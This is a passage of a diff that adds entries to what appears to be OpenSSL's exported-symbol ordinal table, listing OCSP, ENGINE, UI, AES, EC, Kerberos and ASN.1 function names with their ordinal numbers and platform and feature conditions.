+CRYPTO_get_locked_mem_ex_funcs          2781	EXIST:VMS:FUNCTION:
+ASN1_TIME_check                         2782	EXIST::FUNCTION:
+UI_get0_user_data                       2783	EXIST::FUNCTION:
+HMAC_CTX_cleanup                        2784	EXIST::FUNCTION:HMAC
+DSA_up_ref                              2785	EXIST::FUNCTION:DSA
+_ossl_old_des_ede3_cfb64_encrypt        2786	EXIST:!VMS:FUNCTION:DES
+_ossl_odes_ede3_cfb64_encrypt           2786	EXIST:VMS:FUNCTION:DES
+ASN1_BMPSTRING_it                       2787	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_BMPSTRING_it                       2787	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ASN1_tag2bit                            2788	EXIST::FUNCTION:
+UI_method_set_flusher                   2789	EXIST::FUNCTION:
+X509_ocspid_print                       2790	EXIST::FUNCTION:BIO
+KRB5_ENCDATA_it                         2791	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+KRB5_ENCDATA_it                         2791	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ENGINE_get_load_pubkey_function         2792	EXIST::FUNCTION:ENGINE
+UI_add_user_data                        2793	EXIST::FUNCTION:
+OCSP_REQUEST_delete_ext                 2794	EXIST::FUNCTION:
+UI_get_method                           2795	EXIST::FUNCTION:
+OCSP_ONEREQ_free                        2796	EXIST::FUNCTION:
+ASN1_PRINTABLESTRING_it                 2797	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_PRINTABLESTRING_it                 2797	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+X509_CRL_set_nextUpdate                 2798	EXIST::FUNCTION:
+OCSP_REQUEST_it                         2799	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_REQUEST_it                         2799	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_BASICRESP_it                       2800	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_BASICRESP_it                       2800	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+AES_ecb_encrypt                         2801	EXIST::FUNCTION:AES
+BN_mod_sqr                              2802	EXIST::FUNCTION:
+NETSCAPE_CERT_SEQUENCE_it               2803	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+NETSCAPE_CERT_SEQUENCE_it               2803	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+GENERAL_NAMES_it                        2804	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+GENERAL_NAMES_it                        2804	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+AUTHORITY_INFO_ACCESS_it                2805	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+AUTHORITY_INFO_ACCESS_it                2805	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ASN1_FBOOLEAN_it                        2806	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_FBOOLEAN_it                        2806	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_set_ex_data                          2807	EXIST::FUNCTION:
+_ossl_old_des_string_to_key             2808	EXIST::FUNCTION:DES
+ENGINE_register_all_RSA                 2809	EXIST::FUNCTION:ENGINE
+d2i_KRB5_PRINCNAME                      2810	EXIST::FUNCTION:
+OCSP_RESPBYTES_it                       2811	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_RESPBYTES_it                       2811	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+X509_CINF_it                            2812	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_CINF_it                            2812	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ENGINE_unregister_digests               2813	EXIST::FUNCTION:ENGINE
+d2i_EDIPARTYNAME                        2814	EXIST::FUNCTION:
+d2i_OCSP_SERVICELOC                     2815	EXIST::FUNCTION:
+ENGINE_get_digests                      2816	EXIST::FUNCTION:ENGINE
+_ossl_old_des_set_odd_parity            2817	EXIST::FUNCTION:DES
+OCSP_RESPDATA_free                      2818	EXIST::FUNCTION:
+d2i_KRB5_TICKET                         2819	EXIST::FUNCTION:
+OTHERNAME_it                            2820	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OTHERNAME_it                            2820	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EVP_MD_CTX_cleanup                      2821	EXIST::FUNCTION:
+d2i_ASN1_GENERALSTRING                  2822	EXIST::FUNCTION:
+X509_CRL_set_version                    2823	EXIST::FUNCTION:
+BN_mod_sub                              2824	EXIST::FUNCTION:
+OCSP_SINGLERESP_get_ext_by_NID          2825	EXIST::FUNCTION:
+ENGINE_get_ex_new_index                 2826	EXIST::FUNCTION:ENGINE
+OCSP_REQUEST_free                       2827	EXIST::FUNCTION:
+OCSP_REQUEST_add1_ext_i2d               2828	EXIST::FUNCTION:
+X509_VAL_it                             2829	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_VAL_it                             2829	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EC_POINTs_make_affine                   2830	EXIST::FUNCTION:EC
+EC_POINT_mul                            2831	EXIST::FUNCTION:EC
+X509V3_EXT_add_nconf                    2832	EXIST::FUNCTION:
+X509_TRUST_set                          2833	EXIST::FUNCTION:
+X509_CRL_add1_ext_i2d                   2834	EXIST::FUNCTION:
+_ossl_old_des_fcrypt                    2835	EXIST::FUNCTION:DES
+DISPLAYTEXT_it                          2836	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+DISPLAYTEXT_it                          2836	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+X509_CRL_set_lastUpdate                 2837	EXIST::FUNCTION:
+OCSP_BASICRESP_free                     2838	EXIST::FUNCTION:
+OCSP_BASICRESP_add1_ext_i2d             2839	EXIST::FUNCTION:
+d2i_KRB5_AUTHENTBODY                    2840	EXIST::FUNCTION:
+CRYPTO_set_ex_data_implementation       2841	EXIST:!VMS:FUNCTION:
+CRYPTO_set_ex_data_impl                 2841	EXIST:VMS:FUNCTION:
+KRB5_ENCDATA_new                        2842	EXIST::FUNCTION:
+DSO_up_ref                              2843	EXIST::FUNCTION:
+OCSP_crl_reason_str                     2844	EXIST::FUNCTION:
+UI_get0_result_string                   2845	EXIST::FUNCTION:
+ASN1_GENERALSTRING_new                  2846	EXIST::FUNCTION:
+X509_SIG_it                             2847	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_SIG_it                             2847	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ERR_set_implementation                  2848	EXIST::FUNCTION:
+ERR_load_EC_strings                     2849	EXIST::FUNCTION:EC
+UI_get0_action_string                   2850	EXIST::FUNCTION:
+OCSP_ONEREQ_get_ext                     2851	EXIST::FUNCTION:
+EC_POINT_method_of                      2852	EXIST::FUNCTION:EC
+i2d_KRB5_APREQBODY                      2853	EXIST::FUNCTION:
+_ossl_old_des_ecb3_encrypt              2854	EXIST::FUNCTION:DES
+CRYPTO_get_mem_ex_functions             2855	EXIST::FUNCTION:
+ENGINE_get_ex_data                      2856	EXIST::FUNCTION:ENGINE
+UI_destroy_method                       2857	EXIST::FUNCTION:
+ASN1_item_i2d_bio                       2858	EXIST::FUNCTION:BIO
+OCSP_ONEREQ_get_ext_by_OBJ              2859	EXIST::FUNCTION:
+ASN1_primitive_new                      2860	EXIST::FUNCTION:
+ASN1_PRINTABLE_it                       2861	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_PRINTABLE_it                       2861	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EVP_aes_192_ecb                         2862	EXIST::FUNCTION:AES
+OCSP_SIGNATURE_new                      2863	EXIST::FUNCTION:
+LONG_it                                 2864	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+LONG_it                                 2864	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ASN1_VISIBLESTRING_it                   2865	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_VISIBLESTRING_it                   2865	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_SINGLERESP_add1_ext_i2d            2866	EXIST::FUNCTION:
+d2i_OCSP_CERTID                         2867	EXIST::FUNCTION:
+ASN1_item_d2i_fp                        2868	EXIST::FUNCTION:FP_API
+CRL_DIST_POINTS_it                      2869	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+CRL_DIST_POINTS_it                      2869	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+GENERAL_NAME_print                      2870	EXIST::FUNCTION:
+OCSP_SINGLERESP_delete_ext              2871	EXIST::FUNCTION:
+PKCS12_SAFEBAGS_it                      2872	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS12_SAFEBAGS_it                      2872	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+d2i_OCSP_SIGNATURE                      2873	EXIST::FUNCTION:
+OCSP_request_add1_nonce                 2874	EXIST::FUNCTION:
+ENGINE_set_cmd_defns                    2875	EXIST::FUNCTION:ENGINE
+OCSP_SERVICELOC_free                    2876	EXIST::FUNCTION:
+EC_GROUP_free                           2877	EXIST::FUNCTION:EC
+ASN1_BIT_STRING_it                      2878	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_BIT_STRING_it                      2878	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+X509_REQ_it                             2879	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_REQ_it                             2879	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+_ossl_old_des_cbc_encrypt               2880	EXIST::FUNCTION:DES
+ERR_unload_strings                      2881	EXIST::FUNCTION:
+PKCS7_SIGN_ENVELOPE_it                  2882	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS7_SIGN_ENVELOPE_it                  2882	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EDIPARTYNAME_free                       2883	EXIST::FUNCTION:
+OCSP_REQINFO_free                       2884	EXIST::FUNCTION:
+EC_GROUP_new_curve_GFp                  2885	EXIST::FUNCTION:EC
+OCSP_REQUEST_get1_ext_d2i               2886	EXIST::FUNCTION:
+PKCS12_item_pack_safebag                2887	EXIST::FUNCTION:
+asn1_ex_c2i                             2888	EXIST::FUNCTION:
+ENGINE_register_digests                 2889	EXIST::FUNCTION:ENGINE
+i2d_OCSP_REVOKEDINFO                    2890	EXIST::FUNCTION:
+asn1_enc_restore                        2891	EXIST::FUNCTION:
+UI_free                                 2892	EXIST::FUNCTION:
+UI_new_method                           2893	EXIST::FUNCTION:
+EVP_EncryptInit_ex                      2894	EXIST::FUNCTION:
+X509_pubkey_digest                      2895	EXIST::FUNCTION:EVP
+EC_POINT_invert                         2896	EXIST::FUNCTION:EC
+OCSP_basic_sign                         2897	EXIST::FUNCTION:
+i2d_OCSP_RESPID                         2898	EXIST::FUNCTION:
+OCSP_check_nonce                        2899	EXIST::FUNCTION:
+ENGINE_ctrl_cmd                         2900	EXIST::FUNCTION:ENGINE
+d2i_KRB5_ENCKEY                         2901	EXIST::FUNCTION:
+OCSP_parse_url                          2902	EXIST::FUNCTION:
+OCSP_SINGLERESP_get_ext                 2903	EXIST::FUNCTION:
+OCSP_CRLID_free                         2904	EXIST::FUNCTION:
+OCSP_BASICRESP_get1_ext_d2i             2905	EXIST::FUNCTION:
+RSAPrivateKey_it                        2906	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:RSA
+RSAPrivateKey_it                        2906	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:RSA
+ENGINE_register_all_DH                  2907	EXIST::FUNCTION:ENGINE
+i2d_EDIPARTYNAME                        2908	EXIST::FUNCTION:
+EC_POINT_get_affine_coordinates_GFp     2909	EXIST:!VMS:FUNCTION:EC
+EC_POINT_get_affine_coords_GFp          2909	EXIST:VMS:FUNCTION:EC
+OCSP_CRLID_new                          2910	EXIST::FUNCTION:
+ENGINE_get_flags                        2911	EXIST::FUNCTION:ENGINE
+OCSP_ONEREQ_it                          2912	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_ONEREQ_it                          2912	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_process                              2913	EXIST::FUNCTION:
+ASN1_INTEGER_it                         2914	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_INTEGER_it                         2914	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EVP_CipherInit_ex                       2915	EXIST::FUNCTION:
+UI_get_string_type                      2916	EXIST::FUNCTION:
+ENGINE_unregister_DH                    2917	EXIST::FUNCTION:ENGINE
+ENGINE_register_all_DSA                 2918	EXIST::FUNCTION:ENGINE
+OCSP_ONEREQ_get_ext_by_critical         2919	EXIST::FUNCTION:
+bn_dup_expand                           2920	EXIST::FUNCTION:DEPRECATED
+OCSP_cert_id_new                        2921	EXIST::FUNCTION:
+BASIC_CONSTRAINTS_it                    2922	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+BASIC_CONSTRAINTS_it                    2922	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+BN_mod_add_quick                        2923	EXIST::FUNCTION:
+EC_POINT_new                            2924	EXIST::FUNCTION:EC
+EVP_MD_CTX_destroy                      2925	EXIST::FUNCTION:
+OCSP_RESPBYTES_free                     2926	EXIST::FUNCTION:
+EVP_aes_128_cbc                         2927	EXIST::FUNCTION:AES
+OCSP_SINGLERESP_get1_ext_d2i            2928	EXIST::FUNCTION:
+EC_POINT_free                           2929	EXIST::FUNCTION:EC
+DH_up_ref                               2930	EXIST::FUNCTION:DH
+X509_NAME_ENTRY_it                      2931	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_NAME_ENTRY_it                      2931	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_get_ex_new_index                     2932	EXIST::FUNCTION:
+BN_mod_sub_quick                        2933	EXIST::FUNCTION:
+OCSP_ONEREQ_add_ext                     2934	EXIST::FUNCTION:
+OCSP_request_sign                       2935	EXIST::FUNCTION:
+EVP_DigestFinal_ex                      2936	EXIST::FUNCTION:
+ENGINE_set_digests                      2937	EXIST::FUNCTION:ENGINE
+OCSP_id_issuer_cmp                      2938	EXIST::FUNCTION:
+OBJ_NAME_do_all                         2939	EXIST::FUNCTION:
+EC_POINTs_mul                           2940	EXIST::FUNCTION:EC
+ENGINE_register_complete                2941	EXIST::FUNCTION:ENGINE
+X509V3_EXT_nconf_nid                    2942	EXIST::FUNCTION:
+ASN1_SEQUENCE_it                        2943	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_SEQUENCE_it                        2943	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_set_default_method                   2944	EXIST::FUNCTION:
+RAND_query_egd_bytes                    2945	EXIST::FUNCTION:
+UI_method_get_writer                    2946	EXIST::FUNCTION:
+UI_OpenSSL                              2947	EXIST::FUNCTION:
+PEM_def_callback                        2948	EXIST::FUNCTION:
+ENGINE_cleanup                          2949	EXIST::FUNCTION:ENGINE
+DIST_POINT_it                           2950	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+DIST_POINT_it                           2950	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_SINGLERESP_it                      2951	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_SINGLERESP_it                      2951	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+d2i_KRB5_TKTBODY                        2952	EXIST::FUNCTION:
+EC_POINT_cmp                            2953	EXIST::FUNCTION:EC
+OCSP_REVOKEDINFO_new                    2954	EXIST::FUNCTION:
+i2d_OCSP_CERTSTATUS                     2955	EXIST::FUNCTION:
+OCSP_basic_add1_nonce                   2956	EXIST::FUNCTION:
+ASN1_item_ex_d2i                        2957	EXIST::FUNCTION:
+BN_mod_lshift1_quick                    2958	EXIST::FUNCTION:
+UI_set_method                           2959	EXIST::FUNCTION:
+OCSP_id_get0_info                       2960	EXIST::FUNCTION:
+BN_mod_sqrt                             2961	EXIST::FUNCTION:
+EC_GROUP_copy                           2962	EXIST::FUNCTION:EC
+KRB5_ENCDATA_free                       2963	EXIST::FUNCTION:
+_ossl_old_des_cfb_encrypt               2964	EXIST::FUNCTION:DES
+OCSP_SINGLERESP_get_ext_by_OBJ          2965	EXIST::FUNCTION:
+OCSP_cert_to_id                         2966	EXIST::FUNCTION:
+OCSP_RESPID_new                         2967	EXIST::FUNCTION:
+OCSP_RESPDATA_it                        2968	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_RESPDATA_it                        2968	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+d2i_OCSP_RESPDATA                       2969	EXIST::FUNCTION:
+ENGINE_register_all_complete            2970	EXIST::FUNCTION:ENGINE
+OCSP_check_validity                     2971	EXIST::FUNCTION:
+PKCS12_BAGS_it                          2972	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS12_BAGS_it                          2972	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_url_svcloc_new                     2973	EXIST::FUNCTION:
+ASN1_template_free                      2974	EXIST::FUNCTION:
+OCSP_SINGLERESP_add_ext                 2975	EXIST::FUNCTION:
+KRB5_AUTHENTBODY_it                     2976	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+KRB5_AUTHENTBODY_it                     2976	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+X509_supported_extension                2977	EXIST::FUNCTION:
+i2d_KRB5_AUTHDATA                       2978	EXIST::FUNCTION:
+UI_method_get_opener                    2979	EXIST::FUNCTION:
+ENGINE_set_ex_data                      2980	EXIST::FUNCTION:ENGINE
+OCSP_REQUEST_print                      2981	EXIST::FUNCTION:
+CBIGNUM_it                              2982	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+CBIGNUM_it                              2982	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+KRB5_TICKET_new                         2983	EXIST::FUNCTION:
+KRB5_APREQ_new                          2984	EXIST::FUNCTION:
+EC_GROUP_get_curve_GFp                  2985	EXIST::FUNCTION:EC
+KRB5_ENCKEY_new                         2986	EXIST::FUNCTION:
+ASN1_template_d2i                       2987	EXIST::FUNCTION:
+_ossl_old_des_quad_cksum                2988	EXIST::FUNCTION:DES
+OCSP_single_get0_status                 2989	EXIST::FUNCTION:
+BN_swap                                 2990	EXIST::FUNCTION:
+POLICYINFO_it                           2991	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+POLICYINFO_it                           2991	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ENGINE_set_destroy_function             2992	EXIST::FUNCTION:ENGINE
+asn1_enc_free                           2993	EXIST::FUNCTION:
+OCSP_RESPID_it                          2994	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_RESPID_it                          2994	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EC_GROUP_new                            2995	EXIST::FUNCTION:EC
+EVP_aes_256_cbc                         2996	EXIST::FUNCTION:AES
+i2d_KRB5_PRINCNAME                      2997	EXIST::FUNCTION:
+_ossl_old_des_encrypt2                  2998	EXIST::FUNCTION:DES
+_ossl_old_des_encrypt3                  2999	EXIST::FUNCTION:DES
+PKCS8_PRIV_KEY_INFO_it                  3000	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS8_PRIV_KEY_INFO_it                  3000	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_REQINFO_it                         3001	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_REQINFO_it                         3001	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+PBEPARAM_it                             3002	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PBEPARAM_it                             3002	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+KRB5_AUTHENTBODY_new                    3003	EXIST::FUNCTION:
+X509_CRL_add0_revoked                   3004	EXIST::FUNCTION:
+EDIPARTYNAME_it                         3005	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+EDIPARTYNAME_it                         3005	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+NETSCAPE_SPKI_it                        3006	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+NETSCAPE_SPKI_it                        3006	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_get0_test_string                     3007	EXIST::FUNCTION:
+ENGINE_get_cipher_engine                3008	EXIST::FUNCTION:ENGINE
+ENGINE_register_all_ciphers             3009	EXIST::FUNCTION:ENGINE
+EC_POINT_copy                           3010	EXIST::FUNCTION:EC
+BN_kronecker                            3011	EXIST::FUNCTION:
+_ossl_old_des_ede3_ofb64_encrypt        3012	EXIST:!VMS:FUNCTION:DES
+_ossl_odes_ede3_ofb64_encrypt           3012	EXIST:VMS:FUNCTION:DES
+UI_method_get_reader                    3013	EXIST::FUNCTION:
+OCSP_BASICRESP_get_ext_count            3014	EXIST::FUNCTION:
+ASN1_ENUMERATED_it                      3015	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_ENUMERATED_it                      3015	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+UI_set_result                           3016	EXIST::FUNCTION:
+i2d_KRB5_TICKET                         3017	EXIST::FUNCTION:
+X509_print_ex_fp                        3018	EXIST::FUNCTION:FP_API
+EVP_CIPHER_CTX_set_padding              3019	EXIST::FUNCTION:
+d2i_OCSP_RESPONSE                       3020	EXIST::FUNCTION:
+ASN1_UTCTIME_it                         3021	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_UTCTIME_it                         3021	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+_ossl_old_des_enc_write                 3022	EXIST::FUNCTION:DES
+OCSP_RESPONSE_new                       3023	EXIST::FUNCTION:
+AES_set_encrypt_key                     3024	EXIST::FUNCTION:AES
+OCSP_resp_count                         3025	EXIST::FUNCTION:
+KRB5_CHECKSUM_new                       3026	EXIST::FUNCTION:
+ENGINE_load_cswift                      3027	EXIST::FUNCTION:ENGINE,STATIC_ENGINE
+OCSP_onereq_get0_id                     3028	EXIST::FUNCTION:
+ENGINE_set_default_ciphers              3029	EXIST::FUNCTION:ENGINE
+NOTICEREF_it                            3030	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+NOTICEREF_it                            3030	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+X509V3_EXT_CRL_add_nconf                3031	EXIST::FUNCTION:
+OCSP_REVOKEDINFO_it                     3032	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+OCSP_REVOKEDINFO_it                     3032	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+AES_encrypt                             3033	EXIST::FUNCTION:AES
+OCSP_REQUEST_new                        3034	EXIST::FUNCTION:
+ASN1_ANY_it                             3035	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_ANY_it                             3035	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+CRYPTO_ex_data_new_class                3036	EXIST::FUNCTION:
+_ossl_old_des_ncbc_encrypt              3037	EXIST::FUNCTION:DES
+i2d_KRB5_TKTBODY                        3038	EXIST::FUNCTION:
+EC_POINT_clear_free                     3039	EXIST::FUNCTION:EC
+AES_decrypt                             3040	EXIST::FUNCTION:AES
+asn1_enc_init                           3041	EXIST::FUNCTION:
+UI_get_result_maxsize                   3042	EXIST::FUNCTION:
+OCSP_CERTID_new                         3043	EXIST::FUNCTION:
+ENGINE_unregister_RAND                  3044	EXIST::FUNCTION:ENGINE
+UI_method_get_closer                    3045	EXIST::FUNCTION:
+d2i_KRB5_ENCDATA                        3046	EXIST::FUNCTION:
+OCSP_request_onereq_count               3047	EXIST::FUNCTION:
+OCSP_basic_verify                       3048	EXIST::FUNCTION:
+KRB5_AUTHENTBODY_free                   3049	EXIST::FUNCTION:
+ASN1_item_d2i                           3050	EXIST::FUNCTION:
+ASN1_primitive_free                     3051	EXIST::FUNCTION:
+i2d_EXTENDED_KEY_USAGE                  3052	EXIST::FUNCTION:
+i2d_OCSP_SIGNATURE                      3053	EXIST::FUNCTION:
+asn1_enc_save                           3054	EXIST::FUNCTION:
+ENGINE_load_nuron                       3055	EXIST::FUNCTION:ENGINE,STATIC_ENGINE
+_ossl_old_des_pcbc_encrypt              3056	EXIST::FUNCTION:DES
+PKCS12_MAC_DATA_it                      3057	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS12_MAC_DATA_it                      3057	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+OCSP_accept_responses_new               3058	EXIST::FUNCTION:
+asn1_do_lock                            3059	EXIST::FUNCTION:
+PKCS7_ATTR_VERIFY_it                    3060	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS7_ATTR_VERIFY_it                    3060	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+KRB5_APREQBODY_it                       3061	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+KRB5_APREQBODY_it                       3061	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+i2d_OCSP_SINGLERESP                     3062	EXIST::FUNCTION:
+ASN1_item_ex_new                        3063	EXIST::FUNCTION:
+UI_add_verify_string                    3064	EXIST::FUNCTION:
+_ossl_old_des_set_key                   3065	EXIST::FUNCTION:DES
+KRB5_PRINCNAME_it                       3066	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+KRB5_PRINCNAME_it                       3066	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EVP_DecryptInit_ex                      3067	EXIST::FUNCTION:
+i2d_OCSP_CERTID                         3068	EXIST::FUNCTION:
+ASN1_item_d2i_bio                       3069	EXIST::FUNCTION:BIO
+EC_POINT_dbl                            3070	EXIST::FUNCTION:EC
+asn1_get_choice_selector                3071	EXIST::FUNCTION:
+i2d_KRB5_CHECKSUM                       3072	EXIST::FUNCTION:
+ENGINE_set_table_flags                  3073	EXIST::FUNCTION:ENGINE
+AES_options                             3074	EXIST::FUNCTION:AES
+ENGINE_load_chil                        3075	EXIST::FUNCTION:ENGINE,STATIC_ENGINE
+OCSP_id_cmp                             3076	EXIST::FUNCTION:
+OCSP_BASICRESP_new                      3077	EXIST::FUNCTION:
+OCSP_REQUEST_get_ext_by_NID             3078	EXIST::FUNCTION:
+KRB5_APREQ_it                           3079	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+KRB5_APREQ_it                           3079	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ENGINE_get_destroy_function             3080	EXIST::FUNCTION:ENGINE
+CONF_set_nconf                          3081	EXIST::FUNCTION:
+ASN1_PRINTABLE_free                     3082	EXIST::FUNCTION:
+OCSP_BASICRESP_get_ext_by_NID           3083	EXIST::FUNCTION:
+DIST_POINT_NAME_it                      3084	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+DIST_POINT_NAME_it                      3084	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+X509V3_extensions_print                 3085	EXIST::FUNCTION:
+_ossl_old_des_cfb64_encrypt             3086	EXIST::FUNCTION:DES
+X509_REVOKED_add1_ext_i2d               3087	EXIST::FUNCTION:
+_ossl_old_des_ofb_encrypt               3088	EXIST::FUNCTION:DES
+KRB5_TKTBODY_new                        3089	EXIST::FUNCTION:
+ASN1_OCTET_STRING_it                    3090	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+ASN1_OCTET_STRING_it                    3090	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+ERR_load_UI_strings                     3091	EXIST::FUNCTION:
+i2d_KRB5_ENCKEY                         3092	EXIST::FUNCTION:
+ASN1_template_new                       3093	EXIST::FUNCTION:
+OCSP_SIGNATURE_free                     3094	EXIST::FUNCTION:
+ASN1_item_i2d_fp                        3095	EXIST::FUNCTION:FP_API
+KRB5_PRINCNAME_free                     3096	EXIST::FUNCTION:
+PKCS7_RECIP_INFO_it                     3097	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+PKCS7_RECIP_INFO_it                     3097	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EXTENDED_KEY_USAGE_it                   3098	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+EXTENDED_KEY_USAGE_it                   3098	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+EC_GFp_simple_method                    3099	EXIST::FUNCTION:EC
+EC_GROUP_precompute_mult                3100	EXIST::FUNCTION:EC
+OCSP_request_onereq_get0                3101	EXIST::FUNCTION:
+UI_method_set_writer                    3102	EXIST::FUNCTION:
+KRB5_AUTHENT_new                        3103	EXIST::FUNCTION:
+X509_CRL_INFO_it                        3104	EXIST:!EXPORT_VAR_AS_FUNCTION:VARIABLE:
+X509_CRL_INFO_it                        3104	EXIST:EXPORT_VAR_AS_FUNCTION:FUNCTION:
+DSO_set_name_converter                  3105	EXIST::FUNCTION:
+AES_set_decrypt_key                     3106	EXIST::FUNCTION:AES
